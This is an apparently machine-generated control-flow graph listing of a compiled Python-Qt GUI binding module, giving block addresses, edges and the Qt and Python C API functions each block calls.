4263->4265 4264->4258 4266 7ffb9a35dd6a ??1QByteArray@@QEAA 4265->4266 4266->4258 4268 7ffb9a341b90 4269 7ffb9a341bb4 PyType_IsSubtype 4268->4269 4272 7ffb9a341bdd 4268->4272 4270 7ffb9a341bc1 4269->4270 4269->4272 4271 7ffb9a341d01 4272->4271 4273 7ffb9a341c34 ??XQVector2D@@QEAAAEAV0@M 4272->4273 4274 7ffb9a341c59 4272->4274 4275 7ffb9a341cae 4274->4275 4276 7ffb9a341c8a ??XQVector2D@@QEAAAEAV0@AEBV0@ 4274->4276 4277 7ffb9a341cd1 4275->4277 4278 7ffb9a341cc6 _Py_Dealloc 4275->4278 4277->4271 4279 7ffb9a341cda PyErr_Clear 4277->4279 4278->4277 4280 7ffb9a2edb20 4281 7ffb9a2edb41 PyErr_Occurred 4280->4281 4282 7ffb9a2edb4e 4281->4282 4283 7ffb9a2edb5b 4281->4283 4284 7ffb9a2edb98 4283->4284 4285 7ffb9a2edbde 4283->4285 4286 7ffb9a2edbc3 PyBool_FromLong 4284->4286 4287 7ffb9a2edba2 ?matches@QKeyEvent@@QEBA_NW4StandardKey@QKeySequence@@ PyBool_FromLong 4284->4287 4288 7ffb9a2edc2f 4285->4288 4289 7ffb9a2edc0f PyBool_FromLong 4285->4289 4290 7ffb9a2edc45 PyErr_Clear 4288->4290 4291 7ffb9a2edc3f _Py_Dealloc 4288->4291 4291->4290 4292 7ffb9a36bb20 4293 7ffb9a36bb4e 4292->4293 4294 7ffb9a36bb66 ?deallocate@QArrayData@@SAXPEAU1@_K1 4292->4294 4295 7ffb9a36bb50 ??1QTextFormat@@QEAA 4293->4295 4295->4294 4295->4295 4304 7ffb9a309b20 4305 7ffb9a309b62 4304->4305 4306 7ffb9a309b66 ?destroy@QWindow@ 4305->4306 4307 7ffb9a309b87 4305->4307 4308 7ffb9a337b20 4309 7ffb9a337b7f 4308->4309 4310 7ffb9a337bfb 4309->4310 4311 7ffb9a337b83 ??0QVariant@@QEAA@AEBVQStringList@@ ?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@ ??1QVariant@@QEAA 4309->4311 4312 7ffb9a337be0 4311->4312 4313 7ffb9a363b30 4314 7ffb9a363bdd 4313->4314 4315 7ffb9a363b4d 4313->4315 4316 7ffb9a363b7d ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@ 4315->4316 4317 7ffb9a363b66 ?allocate@QArrayData@@SAPEAU1@_K00V?$QFlags@W4AllocationOption@QArrayData@@@@ 4315->4317 4318 7ffb9a363b8a 4316->4318 4317->4318 4318->4314 4319 7ffb9a363b97 memcpy 4318->4319 4320 7ffb9a2e1b80 PyObject_GetIter 4321 7ffb9a2e1c03 4320->4321 4322 7ffb9a2e1bb1 PyErr_Clear 4320->4322 4327 7ffb9a2e1c2e PyErr_Clear PyIter_Next 4321->4327 4328 7ffb9a2e1e35 4321->4328 4323 7ffb9a2e1bbc 4322->4323 4326 7ffb9a2e1bdc 4322->4326 4324 7ffb9a2e1bc3 _Py_Dealloc 4323->4324 4325 7ffb9a2e1bcc PyType_GetFlags 4323->4325 4324->4325 4325->4326 4329 7ffb9a2e1de5 PyErr_Occurred 4327->4329 4342 7ffb9a2e1c5f 4327->4342 4330 7ffb9a2e1edf 4329->4330 4332 7ffb9a2e1df4 4329->4332 4330->4328 4331 7ffb9a2e1ee6 _Py_Dealloc 4330->4331 4331->4328 4332->4328 4337 7ffb9a2e1e2c _Py_Dealloc 4332->4337 4333 7ffb9a2e1e58 PyErr_Format 4338 7ffb9a2e1e8c _Py_Dealloc 4333->4338 4341 7ffb9a2e1e95 4333->4341 4334 7ffb9a2e1ca3 ?detach_grow@QListData@@QEAAPEAUData@1@PEAHH 4334->4342 4335 7ffb9a2e1d7d ?append@QListData@ 4335->4342 4337->4328 4338->4341 4339 7ffb9a2e1db6 _Py_Dealloc 4340 7ffb9a2e1dbf PyErr_Clear PyIter_Next 4339->4340 4340->4329 4340->4342 4341->4328 4343 7ffb9a2e1ed1 _Py_Dealloc 4341->4343 4342->4333 4342->4334 4342->4335 4342->4339 4342->4340 4343->4328 4344 7ffb9a2f9b80 4345 7ffb9a2f9ba4 PyType_IsSubtype 4344->4345 4348 7ffb9a2f9bcd 4344->4348 4346 7ffb9a2f9bb1 4345->4346 4345->4348 4347 7ffb9a2f9cf1 4348->4347 4349 7ffb9a2f9c54 4348->4349 4350 7ffb9a2f9c30 ??XQTransform@@QEAAAEAV0@AEBV0@ 4348->4350 4351 7ffb9a2f9c79 ??XQTransform@@QEAAAEAV0@N 4349->4351 4352 7ffb9a2f9c9e 4349->4352 4353 7ffb9a2f9cc1 4352->4353 4354 7ffb9a2f9cb6 _Py_Dealloc 4352->4354 4353->4347 4355 7ffb9a2f9cca PyErr_Clear 4353->4355 4354->4353 4356 7ffb9a361b40 4357 7ffb9a361b64 PyType_IsSubtype 4356->4357 4361 7ffb9a361b8d 4356->4361 4358 7ffb9a361b71 4357->4358 4357->4361 4359 7ffb9a361c53 4360 7ffb9a361be4 4361->4359 4361->4360 4362 7ffb9a361c23 4361->4362 4363 7ffb9a361c18 _Py_Dealloc 4361->4363 4362->4359 4364 7ffb9a361c2c PyErr_Clear 4362->4364 4363->4362 4365 7ffb9a359b40 4367 7ffb9a359b81 4365->4367 4366 7ffb9a359c43 4367->4366 4368 7ffb9a359bcb ?getAxes@QQuaternion@@QEBAXPEAVQVector3D@@00 4367->4368 4369 7ffb9a359c2b 4368->4369 4374 7ffb9a33bb40 4375 7ffb9a33bb95 4374->4375 4376 7ffb9a33bbbf 4375->4376 4377 7ffb9a33bb99 ?drawPath@QPainter@@QEAAXAEBVQPainterPath@@ 4375->4377 4383 7ffb9a301b70 4384 7ffb9a301bb2 4383->4384 4385 7ffb9a301bb6 ?minimumSize@QWindow@@QEBA?AVQSize@ PyLong_FromLong 4384->4385 4386 7ffb9a301bd3 4384->4386 4387 7ffb9a2f5b70 4388 7ffb9a2f5bcf 4387->4388 4389 7ffb9a2f5bd3 ?setPosition@QTextLayout@@QEAAXAEBVQPointF@@ 4388->4389 4390 7ffb9a2f5c20 4388->4390 4391 7ffb9a2f5c0a 4389->4391 4392 7ffb9a2f1b70 4393 7ffb9a2f1b99 4392->4393 4394 7ffb9a2f1ba1 4393->4394 4395 7ffb9a2f1c15 4393->4395 4396 7ffb9a2f1beb ?isCopyOf@QTextCursor@@QEBA_NAEBV1@ PyBool_FromLong 4393->4396 4397 7ffb9a2f1c25 _Py_Dealloc 4395->4397 4398 7ffb9a2f1c2b 4395->4398 4397->4398 4415 7ffb9a317b50 4416 7ffb9a317b79 4415->4416 4417 7ffb9a317b81 4416->4417 4418 7ffb9a317bcb ??9Tab@QTextOption@@QEBA_NAEBU01@ PyBool_FromLong 4416->4418 4419 7ffb9a317bf2 4416->4419 4420 7ffb9a317c08 4419->4420 4421 7ffb9a317c02 _Py_Dealloc 4419->4421 4421->4420 4422 7ffb9a345b50 4423 7ffb9a345bb9 4422->4423 4424 7ffb9a345bfe 4423->4424 4425 7ffb9a345bbd ?contains@QPainterPath@@QEBA_NAEBVQPointF@@ 4423->4425 4427 7ffb9a345c6d 4424->4427 4428 7ffb9a345c4b ?contains@QPainterPath@@QEBA_NAEBVQRectF@@ PyBool_FromLong 4424->4428 4426 7ffb9a345beb PyBool_FromLong 4425->4426 4429 7ffb9a345cd5 4427->4429 4430 7ffb9a345cb3 ?contains@QPainterPath@@QEBA_NAEBV1@ PyBool_FromLong 4427->4430 4435 7ffb9a307b60 4436 7ffb9a307ba2 4435->4436 4437 7ffb9a307ba6 ?isTableFormat@QTextFormat@ PyBool_FromLong 4436->4437 4438 7ffb9a307bbf 4436->4438 4439 7ffb9a2ebb60 4440 7ffb9a2ebba2 4439->4440 4441 7ffb9a2ebbdd 4440->4441 4442 7ffb9a2ebbb0 ?font@QTextItem@@QEBA?AVQFont@ 4440->4442 4443 7ffb9a2ebbd8 4442->4443 4444 7ffb9a329be0 4445 7ffb9a329c22 4444->4445 4446 7ffb9a329c5d 4445->4446 4447 7ffb9a329c30 ?version@QSurfaceFormat@@QEBA?AU?$QPair@HH@ 4445->4447 4448 7ffb9a329c58 4447->4448 4449 7ffb9a2fbbd0 4450 7ffb9a2fbc12 4449->4450 4451 7ffb9a2fbc16 ?isVisible@QWindow@ PyBool_FromLong 4450->4451 4452 7ffb9a2fbc2f 4450->4452 4453 7ffb9a325bf0 PyFloat_AsDouble PyErr_Occurred 4454 7ffb9a325c15 4453->4454 4455 7ffb9a33bbf0 4456 7ffb9a33bc32 4455->4456 4457 7ffb9a33bc36 ?blockFormatIndex@QTextBlock@ PyLong_FromLong 4456->4457 4458 7ffb9a33bc4e 4456->4458 4459 7ffb9a2e5bc0 4460 7ffb9a2e5c02 4459->4460 4461 7ffb9a2e5c06 ?leading@QTextLine@ PyFloat_FromDouble 4460->4461 4462 7ffb9a2e5c1c 4460->4462 4463 7ffb9a303bc0 4464 7ffb9a303c08 4463->4464 4465 7ffb9a303c66 4464->4465 4466 7ffb9a303c0c 4464->4466 4468 7ffb9a303ccf 4465->4468 4470 7ffb9a303ca1 ?pictureFormat@QPictureIO@@SA?AVQByteArray@@PEAVQIODevice@@ 4465->4470 4467 7ffb9a303c16 ?pictureFormat@QPictureIO@@SA?AVQByteArray@@AEBVQString@@ 4466->4467 4469 7ffb9a303c46 4467->4469 4471 7ffb9a303cc9 4470->4471 4479 7ffb9a311c00 4480 7ffb9a311c42 4479->4480 4481 7ffb9a311c5f 4480->4481 4482 7ffb9a311c46 ?isSolid@QPen@ PyBool_FromLong 4480->4482 4483 7ffb9a339c00 4484 7ffb9a339c4a 4483->4484 4485 7ffb9a339c4e ?setUseHoverEffects@QStyleHints@@QEAAX_N 4484->4485 4486 7ffb9a339c74 4484->4486 4487 7ffb9a2dfbb6 ??6@YAAEAVQDataStream@@AEAV0@AEBVQFont@@ 4488 7ffb9a2f7bb0 4489 7ffb9a2f7bd4 PyType_IsSubtype 4488->4489 4491 7ffb9a2f7bfd 4488->4491 4490 7ffb9a2f7be1 4489->4490 4489->4491 4492 7ffb9a2f7ccc 4491->4492 4493 7ffb9a2f7c79 4491->4493 4494 7ffb9a2f7c54 ??ZQTransform@@QEAAAEAV0@N 4491->4494 4495 7ffb9a2f7c9c 4493->4495 4496 7ffb9a2f7c91 _Py_Dealloc 4493->4496 4495->4492 4497 7ffb9a2f7ca5 PyErr_Clear 4495->4497 4496->4495 4502 7ffb9a35fc10 4503 7ffb9a35fc19 4502->4503 4504 7ffb9a35fc53 4502->4504 4503->4504 4505 7ffb9a35fc40 ??1QTextDocumentFragment@@QEAA 4503->4505 4505->4504 4505->4505 4506 7ffb9a32dc10 4507 7ffb9a32dc52 4506->4507 4508 7ffb9a32dc56 ?boolProperty@QTextFormat@@QEBA_NH PyBool_FromLong 4507->4508 4509 7ffb9a32dc74 4507->4509 4510 7ffb9a2dbb9e ??5@YAAEAVQDataStream@@AEAV0@AEAVQPolygon@@ 4511 7ffb9a35bba0 4512 7ffb9a35bbe2 4511->4512 4513 7ffb9a35bc10 4512->4513 4514 7ffb9a35bbe6 ?device@QTextDocumentWriter@@QEBAPEAVQIODevice@ 4512->4514 4515 7ffb9a35bc0b 4514->4515 4520 7ffb9a30dba0 4521 7ffb9a30dbf2 4520->4521 4522 7ffb9a30dc20 4521->4522 4523 7ffb9a30dbf6 ?insertRows@QTextTable@@QEAAXHH 4521->4523 4524 7ffb9a32fba0 4525 7ffb9a32fbea 4524->4525 4526 7ffb9a32fbee ?setTableCellRowSpan@QTextCharFormat@@QEAAXH 4525->4526 4527 7ffb9a32fc13 4525->4527 4536 7ffb9a301c10 4537 7ffb9a301c52 4536->4537 4538 7ffb9a301c56 ?atStart@QTextCursor@ PyBool_FromLong 4537->4538 4539 7ffb9a301c6f 4537->4539 4540 7ffb9a2ebc10 4541 7ffb9a2ebc52 4540->4541 4542 7ffb9a2ebc56 ?pageCount@QTextDocument@ PyLong_FromLong 4541->4542 4543 7ffb9a2ebc6e 4541->4543 4548 7ffb9a2dbc06 ??5@YAAEAVQDataStream@@AEAV0@AEAVQVector4D@@ 4549 7ffb9a33fbb0 4550 7ffb9a33fbd9 4549->4550 4551 7ffb9a33fbe1 4550->4551 4552 7ffb9a33fc2b ??8QStaticText@@QEBA_NAEBV0@ PyBool_FromLong 4550->4552 4553 7ffb9a33fc52 4550->4553 4554 7ffb9a33fc68 4553->4554 4555 7ffb9a33fc62 _Py_Dealloc 4553->4555 4555->4554 4556 7ffb9a347bb0 ??0iterator@QTextFrame@@QEAA@AEBV01@ 4557 7ffb9a2d9c00 4558 7ffb9a2d9c20 4557->4558 4559 7ffb9a2d9cb9 ?fixup@QIntValidator@@UEBAXAEAVQString@@ 4558->4559 4560 7ffb9a2d9cc1 4558->4560 4559->4560 4561 7ffb9a2d1c00 4562 7ffb9a2d1c4e 4561->4562 4563 7ffb9a2d1c5c ?intersected@QPolygonF@@QEBA?AV1@AEBV1@ 4562->4563 4564 7ffb9a2d1c8e 4562->4564 4565 7ffb9a2d1c89 4563->4565 4566 7ffb9a309bc0 4567 7ffb9a309be9 4566->4567 4568 7ffb9a309bf1 4567->4568 4569 7ffb9a309c3b ??8QTextCursor@@QEBA_NAEBV0@ PyBool_FromLong 4567->4569 4570 7ffb9a309c62 4567->4570 4571 7ffb9a309c78 4570->4571 4572 7ffb9a309c72 _Py_Dealloc 4570->4572 4572->4571 4573 7ffb9a343bc0 4576 7ffb9a343c28 4573->4576 4574 7ffb9a343c2c ?addEllipse@QPainterPath@@QEAAXAEBVQRectF@@ 4576->4574 4577 7ffb9a343ced 4576->4577 4578 7ffb9a343d5c ?addEllipse@QPainterPath@@QEAAXAEBVQPointF@@NN 4577->4578 4579 7ffb9a343d90 4577->4579 4578->4579 4580 7ffb9a331bc0 4581 7ffb9a331c0e 4580->4581 4582 7ffb9a331c12 ?isCopyOf@QTextCursor@@QEBA_NAEBV1@ PyBool_FromLong 4581->4582 4583 7ffb9a331c30 4581->4583 4584 7ffb9a307bf0 4585 7ffb9a307c3a 4584->4585 4586 7ffb9a307c63 4585->4586 4587 7ffb9a307c3e ?setVerticalMovementX@QTextCursor@@QEAAXH 4585->4587 4588 7ffb9a2efbf0 4589 7ffb9a2efc10 4588->4589 4590 7ffb9a2efc8b ?createObject@QTextDocument@@MEAAPEAVQTextObject@@AEBVQTextFormat@@ 4589->4590 4591 7ffb9a2efc93 4589->4591 4590->4591 4592 7ffb9a33dbd0 4593 7ffb9a33dc12 4592->4593 4594 7ffb9a33dc4d 4593->4594 4595 7ffb9a33dc20 ?end@QTextBlock@@QEBA?AViterator@1 4593->4595 4596 7ffb9a33dc48 4595->4596 4603 7ffb9a2ddbe0 4604 7ffb9a2ddc41 4603->4604 4605 7ffb9a2ddc45 4604->4605 4606 7ffb9a2ddc92 4604->4606 4620 7ffb9a367940 PyList_Size 4605->4620 4609 7ffb9a2dddb9 4606->4609 4611 7ffb9a2ddce9 PyTuple_Size 4606->4611 4608 7ffb9a2ddc52 4608->4609 4610 7ffb9a2ddc5e ?setPoints@QPolygon@@QEAAXHPEBH 4608->4610 4612 7ffb9a2ddc76 4610->4612 4613 7ffb9a3f9d5c 4611->4613 4614 7ffb9a2ddd29 PyTuple_Size 4613->4614 4615 7ffb9a2ddd46 4614->4615 4616 7ffb9a2ddd7e ?setPoints@QPolygon@@QEAAXHPEBH 4614->4616 4617 7ffb9a2ddd50 PyTuple_GetItem PyLong_AsLong PyTuple_Size 4615->4617 4618 7ffb9a2ddd96 4616->4618 4617->4616 4617->4617 4618->4612 4619 7ffb9a2dddae _Py_Dealloc 4618->4619 4619->4612 4621 7ffb9a3f9d5c 4620->4621 4622 7ffb9a367979 PyList_Size PyList_Size 4621->4622 4623 7ffb9a36799a 4622->4623 4624 7ffb9a3679d4 4622->4624 4625 7ffb9a3679a0 PyList_GetItem PyLong_AsLong PyErr_Occurred 4623->4625 4624->4608 4626 7ffb9a3679c3 PyList_Size 4625->4626 4627 7ffb9a3679e7 4625->4627 4626->4624 4626->4625 4627->4608 4628 7ffb9a2e7be0 4629 7ffb9a2e7c35 4628->4629 4630 7ffb9a2e7c57 4629->4630 4631 7ffb9a2e7c39 ?isSignalConnected@QObject@@IEBA_NAEBVQMetaMethod@@ PyBool_FromLong 4629->4631 4632 7ffb9a2d3be0 4633 7ffb9a2d3bf6 4632->4633 4634 7ffb9a2d3c4b ?thread@QObject@@QEBAPEAVQThread@ ?currentThread@QThread@@SAPEAV1 4633->4634 4637 7ffb9a2d3c8c 4633->4637 4635 7ffb9a2d3c83 ?deleteLater@QObject@ 4634->4635 4636 7ffb9a2d3c65 4634->4636 4635->4637 4636->4635 4636->4637 4638 7ffb9a331c60 4640 7ffb9a331ca2 4638->4640 4639 7ffb9a331cdd 4640->4639 4641 7ffb9a331cb0 ?fontMetrics@QPainter@@QEBA?AVQFontMetrics@ 4640->4641 4642 7ffb9a331cd8 4641->4642 4643 7ffb9a2e5c50 4644 7ffb9a2e5cc9 4643->4644 4645 7ffb9a2e5cf5 4644->4645 4646 7ffb9a2e5ccd ?lastIndexOf@?$QVector@VQPoint@@@@QEBAHAEBVQPoint@@H PyLong_FromLong 4644->4646 4647 7ffb9a2f5c50 4648 7ffb9a2f5ca3 4647->4648 4649 7ffb9a2f5ca7 4648->4649 4650 7ffb9a2f5d1d 4648->4650 4652 7ffb9a2f5cb1 ??ZQTransform@@QEAAAEAV0@N 4649->4652 4651 7ffb9a2f5d40 4650->4651 4653 7ffb9a2f5d35 _Py_Dealloc 4650->4653 4654 7ffb9a2f5d12 4652->4654 4653->4651 4666 7ffb9a30fc70 4667 7ffb9a30fc8d PySequence_Check 4666->4667 4668 7ffb9a30fcca PySequence_Size 4666->4668 4669 7ffb9a30fc97 PyType_GetFlags 4667->4669 4670 7ffb9a30fca7 4667->4670 4671 7ffb9a30fd29 PySequence_GetItem 4668->4671 4672 7ffb9a30fcea 4668->4672 4669->4670 4673 7ffb9a30fd3c PyErr_Occurred 4671->4673 4688 7ffb9a30fd09 4671->4688 4674 7ffb9a30fcf6 PyErr_Format 4672->4674 4672->4688 4673->4672 4676 7ffb9a30fd7f PySequence_GetItem 4673->4676 4674->4688 4677 7ffb9a30fdf1 4676->4677 4678 7ffb9a30fd93 PyErr_Occurred 4676->4678 4679 7ffb9a30fdfa _Py_Dealloc 4677->4679 4677->4688 4681 7ffb9a30fe08 4678->4681 4682 7ffb9a30fdb8 PyErr_Format 4678->4682 4679->4688 4685 7ffb9a30fe2b 4681->4685 4686 7ffb9a30fe22 _Py_Dealloc 4681->4686 4682->4677 4684 7ffb9a30fde8 _Py_Dealloc 4682->4684 4684->4677 4687 7ffb9a30fe30 _Py_Dealloc 4685->4687 4685->4688 4686->4685 4687->4688 4689 7ffb9a333c70 4690 7ffb9a333cbe 4689->4690 4691 7ffb9a333cc2 ?swap@QTextFormat@@QEAAXAEAV1@ 4690->4691 4692 7ffb9a333ce8 4690->4692 4693 7ffb9a359c80 4694 7ffb9a359cc2 4693->4694 4695 7ffb9a359cec 4694->4695 4696 7ffb9a359cc6 ?compositionMode@QPaintEngineState@@QEBA?AW4CompositionMode@QPainter@ 4694->4696 4697 7ffb9a359ce7 4696->4697 4698 7ffb9a35fc80 ??4QTextDocumentFragment@@QEAAAEAV0@AEBV0@ 4699 7ffb9a36dc80 4700 7ffb9a36dcb6 4699->4700 4701 7ffb9a36dccf 4700->4701 4702 7ffb9a36dcbb ?newPage@QPdfWriter@ 4700->4702 4703 7ffb9a36bc80 4704 7ffb9a36bcbe 4703->4704 4705 7ffb9a36bcdf 4704->4705 4706 7ffb9a36bcc3 ?hasChildren@QStandardItemModel@@UEBA_NAEBVQModelIndex@@ 4704->4706 4719 7ffb9a33dc80 4720 7ffb9a33dcd5 4719->4720 4721 7ffb9a33dcff 4720->4721 4722 7ffb9a33dcd9 ?setTextOption@QStaticText@@QEAAXAEBVQTextOption@@ 4720->4722 4723 7ffb9a2e3c30 4724 7ffb9a2e3c72 4723->4724 4725 7ffb9a2e3c76 ?documentLayout@QTextDocument@@QEBAPEAVQAbstractTextDocumentLayout@ 4724->4725 4726 7ffb9a2e3ca0 4724->4726 4727 7ffb9a2e3c9b 4725->4727 4728 7ffb9a2fdc30 4729 7ffb9a2fdc72 4728->4729 4730 7ffb9a2fdc76 ?clearSelection@QTextCursor@ 4729->4730 4731 7ffb9a2fdc97 4729->4731 4737 7ffb9a315c90 4738 7ffb9a315cd1 4737->4738 4739 7ffb9a315cdf ??0QTextFrameFormat@@QEAA 4738->4739 4741 7ffb9a315cf8 4738->4741 4739->4741 4740 7ffb9a315d6f 4741->4740 4742 7ffb9a315d4b ??0QFont@@QEAA@AEBV0@ 4741->4742 4747 7ffb9a32bc90 4748 7ffb9a32bcd2 4747->4748 4749 7ffb9a32bcd6 ?fontUnderline@QTextCharFormat@ PyBool_FromLong 4748->4749 4750 7ffb9a32bcef 4748->4750 4751 7ffb9a329c90 4754 7ffb9a329cfc 4751->4754 4752 7ffb9a329dc6 4753 7ffb9a329d16 ?brush@QPalette@@QEBAAEBVQBrush@@W4ColorGroup@1@W4ColorRole@1@ ??0QBrush@@QEAA@AEBV0@ 4755 7ffb9a329d4d 4753->4755 4754->4752 4754->4753 4756 7ffb9a305c20 4757 7ffb9a305c55 4756->4757 4758 7ffb9a305c77 4757->4758 4759 7ffb9a305c64 ??0QPictureIO@@QEAA 4757->4759 4759->4758 4759->4759 4760 7ffb9a2ffc20 4761 7ffb9a2ffc62 4760->4761 4762 7ffb9a2ffc66 ?contentOrientation@QWindow@@QEBA?AW4ScreenOrientation@Qt@ 4761->4762 4763 7ffb9a2ffc8c 4761->4763 4764 7ffb9a2ffc87 4762->4764 4765 7ffb9a2f3c20 4766 7ffb9a2f3c46 4765->4766 4767 7ffb9a2f3c4a ?cacheLimit@QPixmapCache@ PyLong_FromLong 4766->4767 4768 7ffb9a2f3c5d 4766->4768 4769 7ffb9a2dfc1e ??6@YAAEAVQDataStream@@AEAV0@AEBVQIcon@@ 4770 7ffb9a369c20 4771 7ffb9a369c67 4770->4771 4772 7ffb9a369c6f ?drawRects@QPaintEngine@@UEAAXPEBVQRectF@@H 4771->4772 4773 7ffb9a369c80 4771->4773 4772->4773 4774 7ffb9a313c20 4775 7ffb9a313c3b 4774->4775 4776 7ffb9a313d72 4774->4776 4777 7ffb9a313c59 ?detach@QListData@@QEAAPEAUData@1@H 4775->4777 4782 7ffb9a313cd8 4775->4782 4778 7ffb9a313c9d 4777->4778 4777->4782 4780 7ffb9a313caa ??0QTextCharFormat@@QEAA@AEBV0@ 4778->4780 4779 7ffb9a313d69 ?dispose@QListData@@SAXPEAUData@1@ 4779->4776 4780->4778 4780->4782 4781 7ffb9a313d4d ??1QTextFormat@@QEAA 4781->4782 4782->4776 4782->4779 4782->4781 4783 7ffb9a2e7c90 4784 7ffb9a2e7cbd 4783->4784 4785 7ffb9a2e7ce3 4784->4785 4786 7ffb9a2e7cd0 ??0QTextLength@@QEAA 4784->4786 4786->4785 4786->4786 4787 7ffb9a305c90 4788 7ffb9a305cd2 4787->4788 4789 7ffb9a305d0d 4788->4789 4790 7ffb9a305ce0 ?name@QScreen@@QEBA?AVQString@ 4788->4790 4791 7ffb9a305d08 4790->4791 4796 7ffb9a353c30 4797 7ffb9a353c87 4796->4797 4798 7ffb9a353c8b 4797->4798 4799 7ffb9a353ccd 4797->4799 4802 7ffb9a353c95 ??UQPainterPath@@QEBA?AV0@AEBV0@ 4798->4802 4800 7ffb9a353cf0 4799->4800 4801 7ffb9a353ce5 _Py_Dealloc 4799->4801 4801->4800 4803 7ffb9a353cc2 4802->4803 4813 7ffb9a2dfc86 ??6@YAAEAVQDataStream@@AEAV0@AEBVQImage@@ 4814 7ffb9a337c30 4815 7ffb9a337c72 4814->4815 4816 7ffb9a337c8e 4815->4816 4817 7ffb9a337c76 ?passwordMaskDelay@QStyleHints@ PyLong_FromLong 4815->4817 4818 7ffb9a35bc40 4819 7ffb9a35bc82 4818->4819 4820 7ffb9a35bcbd 4819->4820 4821 7ffb9a35bc90 ?toEulerAngles@QQuaternion@@QEBA?AVQVector3D@ 4819->4821 4822 7ffb9a35bcb8 4821->4822 4823 7ffb9a351c40 4824 7ffb9a351c82 4823->4824 4825 7ffb9a351cbd 4824->4825 4826 7ffb9a351c90 ?lastCursorPosition@QTextFrame@@QEBA?AVQTextCursor@ 4824->4826 4827 7ffb9a351cb8 4826->4827 4836 7ffb9a327c40 4837 7ffb9a327ca1 4836->4837 4838 7ffb9a327cd0 4837->4838 4839 7ffb9a327ca5 ?distanceToPlane@QVector3D@@QEBAMAEBV1@0 PyFloat_FromDouble 4837->4839 4840 7ffb9a327d71 4838->4840 4841 7ffb9a327d41 ?distanceToPlane@QVector3D@@QEBAMAEBV1@00 PyFloat_FromDouble 4838->4841 4842 7ffb9a317c40 4843 7ffb9a317c82 4842->4843 4844 7ffb9a317cbd 4843->4844 4845 7ffb9a317c90 ?normalized@QVector4D@@QEBA?AV1 4843->4845 4846 7ffb9a317cb8 4845->4846 4847 7ffb9a2f1c70 4848 7ffb9a2f1ccd 4847->4848 4849 7ffb9a2f1cd1 ?setVerticalHeaderItem@QStandardItemModel@@QEAAXHPEAVQStandardItem@@ 4848->4849 4850 7ffb9a2f1cfe 4848->4850 4851 7ffb9a2edc70 4852 7ffb9a2edcb2 4851->4852 4853 7ffb9a2edcb6 ?clear@QStandardItemModel@ 4852->4853 4854 7ffb9a2edcd7 4852->4854 4855 7ffb9a2dbc6e ??5@YAAEAVQDataStream@@AEAV0@AEAVQRegion@@ 4856 7ffb9a34dc50 4857 7ffb9a34dc9a 4856->4857 4858 7ffb9a34dc9e ?setDropEnabled@QStandardItem@@QEAAX_N 4857->4858 4859 7ffb9a34dcc4 4857->4859 4860 7ffb9a34bc50 4861 7ffb9a34bc9a 4860->4861 4862 7ffb9a34bc9e ?setCheckable@QStandardItem@@QEAAX_N 4861->4862 4863 7ffb9a34bcc4 4861->4863 4872 7ffb9a30dc50 4873 7ffb9a30dc92 4872->4873 4874 7ffb9a30dc96 PyEval_SaveThread ?showFullScreen@QWindow@ PyEval_RestoreThread 4873->4874 4875 7ffb9a30dcd3 4873->4875 4876 7ffb9a32fc50 4877 7ffb9a32fca5 4876->4877 4878 7ffb9a32fca9 ?begin@QPainter@@QEAA_NPEAVQPaintDevice@@ PyBool_FromLong 4877->4878 4879 7ffb9a32fcc7 4877->4879 4880 7ffb9a2fbc60 4881 7ffb9a2fbca2 4880->4881 4882 7ffb9a2fbca6 ?formatIndex@QTextInlineObject@ PyLong_FromLong 4881->4882 4883 7ffb9a2fbcbe 4881->4883 4888 7ffb9a35d8e0 4889 7ffb9a35d926 4888->4889 4890 7ffb9a35d92a 4889->4890 4894 7ffb9a35d962 4889->4894 4891 7ffb9a35d934 ?key@QPageSize@@QEBA?AVQString@ 4890->4891 4893 7ffb9a35d95c 4891->4893 4892 7ffb9a35d9ca 4894->4892 4895 7ffb9a35d99d ?key@QPageSize@@SA?AVQString@@W4PageSizeId@1@ 4894->4895 4896 7ffb9a35d9c4 4895->4896 4901 7ffb9a30b8e0 4902 7ffb9a30b92a 4901->4902 4903 7ffb9a30b92e ??0QVariant@@QEAA@_N ?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@ ??1QVariant@@QEAA 4902->4903 4904 7ffb9a30b984 4902->4904 4905 7ffb9a3098e0 4906 7ffb9a309922 4905->4906 4907 7ffb9a309930 ?availableVirtualGeometry@QScreen@@QEBA?AVQRect@ 4906->4907 4908 7ffb9a30995d 4906->4908 4909 7ffb9a309958 4907->4909 4910 7ffb9a2df8d0 4911 7ffb9a2df912 4910->4911 4912 7ffb9a2df94d 4911->4912 4913 7ffb9a2df920 ?rect@QTextLine@@QEBA?AVQRectF@ 4911->4913 4914 7ffb9a2df948 4913->4914 4915 7ffb9a2e58d0 4916 7ffb9a2e592f 4915->4916 4917 7ffb9a2e5933 ?setHtml@QTextDocument@@QEAAXAEBVQString@@ 4916->4917 4918 7ffb9a2e5980 4916->4918 4919 7ffb9a2e596a 4917->4919 4924 7ffb9a2db8c6 ??5@YAAEAVQDataStream@@AEAV0@AEAVQMatrix4x4@@ 4925 7ffb9a2f78c0 4926 7ffb9a2f7902 4925->4926 4927 7ffb9a2f7906 PyLong_FromUnsignedLong 4926->4927 4928 7ffb9a2f791f 4926->4928 4937 7ffb9a369900 4938 7ffb9a369947 4937->4938 4939 7ffb9a36994f ?drawPoints@QPaintEngine@@UEAAXPEBVQPointF@@H 4938->4939 4940 7ffb9a369960 4938->4940 4939->4940 4941 7ffb9a333900 4942 7ffb9a333942 4941->4942 4943 7ffb9a33395f 4942->4943 4944 7ffb9a333946 ?cacheKey@QPalette@ PyLong_FromLongLong 4942->4944 4945 7ffb9a3038b0 4946 7ffb9a30390f 4945->4946 4947 7ffb9a303913 ?setDiscardCommand@QSessionManager@@QEAAXAEBVQStringList@@ 4946->4947 4949 7ffb9a303960 4946->4949 4948 7ffb9a30394a 4947->4948 4950 7ffb9a3078b0 4951 7ffb9a3078f2 4950->4951 4952 7ffb9a3078f6 ?positionInBlock@QTextCursor@ PyLong_FromLong 4951->4952 4953 7ffb9a30790e 4951->4953 4972 7ffb9a36f8a0 PyType_GetFlags 4973 7ffb9a36f90d PyErr_Format 4972->4973 4974 7ffb9a36f8d5 PyArg_ParseTuple 4972->4974 4976 7ffb9a36f909 4973->4976 4974->4973 4975 7ffb9a36f8f4 4974->4975 4975->4973 4975->4976 4977 7ffb9a32f8a0 4978 7ffb9a32f8c9 4977->4978 4979 7ffb9a32f8d1 4978->4979 4980 7ffb9a32f91b ??9@YA_NAEBVQSurfaceFormat@@0 